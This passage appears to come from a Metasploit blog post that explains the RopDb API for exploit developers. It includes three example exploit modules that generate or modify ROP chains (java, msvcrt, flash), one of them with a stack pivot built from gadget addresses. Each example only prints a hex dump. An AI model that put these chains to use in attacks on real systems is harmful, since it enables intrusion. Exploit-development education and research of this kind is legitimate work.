    • "size" - The payload size
    • "size_negate" - Sometimes a ROP chain may use the "NEG" instruction to calculate the payload size.

 

The RopDB Functions

 

Now, let's talk about the API.  There are three functions you can use in an exploit, they are:

  • generate_rop_payload() - This is used when the exploit does not have to modify the ROP chain at all.  It will generate a ROP payload in the following layout, with the stack pivot optional (in case you need to put it somewhere else):

Stack PivotROP ChainPayload

 

  • select_rop() - This is used in case the exploit needs to modify the ROP chain more freely.  When select_rop() is used, you're basically overriding rop_payload() too in order to build the payload.
  • has_rop?() - This is used in case you need to check if a ROP chain is actually available before picking one.

 

Code Examples

 

1. Generating a basic ROP payload

 

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::RopDb

  def initialize(info={})
  super(update_info(info,
  'Name'          => "RopDb Example 1",
  'Description'    => %q{RopDb Example 1},
  'License'        => MSF_LICENSE,
  'Author'        => [ 'sinn3r' ],
  'References'    => [ [ 'URL', 'http://metasploit.com' ] ],
  'Platform'      => 'win',
  'Targets'        => [ [ 'Automatic', {} ] ],
  'Privileged'    => false,
  'DisclosureDate' => "Oct 2 2012",
  'DefaultTarget'  => 0))
  end

  def exploit
  # This will generate a payload including our Java ROP
  rop_payload = generate_rop_payload('java', payload.encoded)

  # Print out the payload for inspection
  print_line(Rex::Text.to_hex_dump(rop_payload))
  end
end





 

 

2. Select a ROP chain, and then modify it

 

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::RopDb

  def initialize(info={})
  super(update_info(info,
  'Name'          => "RopDb Example 1",
  'Description'    => %q{RopDb Example 2},
  'License'        => MSF_LICENSE,
  'Author'        => [ 'sinn3r' ],
  'References'    => [ [ 'URL', 'http://metasploit.com' ] ],
  'Platform'      => 'win',
  'Targets'        => [ [ 'Automatic', {} ] ],
  'Privileged'    => false,
  'DisclosureDate' => "Oct 2 2012",
  'DefaultTarget'  => 0))
  end

  def exploit
  rop = select_rop('msvcrt')

  # Modify dwSize for VirtualProtect()
  rop[0] = 0x00000300

  # Print the ROP chain for inspection
  print_line(Rex::Text.to_hex_dump(rop))
  end
end





 

3. Generate a ROP payload with a specific target version, a different base address, and a stack pivot):

 

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::RopDb

  def initialize(info={})
  super(update_info(info,
  'Name'          => "RopDb Example 1",
  'Description'    => %q{RopDb Example 3},
  'License'        => MSF_LICENSE,
  'Author'        => [ 'sinn3r' ],
  'References'    => [ [ 'URL', 'http://metasploit.com' ] ],
  'Platform'      => 'win',
  'Targets'        => [ [ 'Automatic', {} ] ],
  'Privileged'    => false,
  'DisclosureDate' => "Oct 2 2012",
  'DefaultTarget'  => 0))
  end

  def exploit
  pivot = [
  0x20004171, # POP EDI # POP ESI # RETN (1e0d0000)
  0x0c0c0c0c,
  0x2001d755, # xchg eax, esp # ret (1e0d0008)
  ].pack("V*")

  p = payload.encoded

  rop_payload = generate_rop_payload('flash', p, {'pivot'=>pivot, 'target'=>'11.3.300.268', 'base'=>0x20000000})

  print_line(Rex::Text.to_hex_dump(rop_payload))

  end
end





 

 

If you're new to Metasploit module development, please also check our Metasploit Development Environment for tips on setting that all up, and then get ROPpin' like a ROP star.

 

===

UPDATE:

  • Oct 4th 2012 - mona.py now supports RopDb database XML format.

Filter Blog

By date: By tag: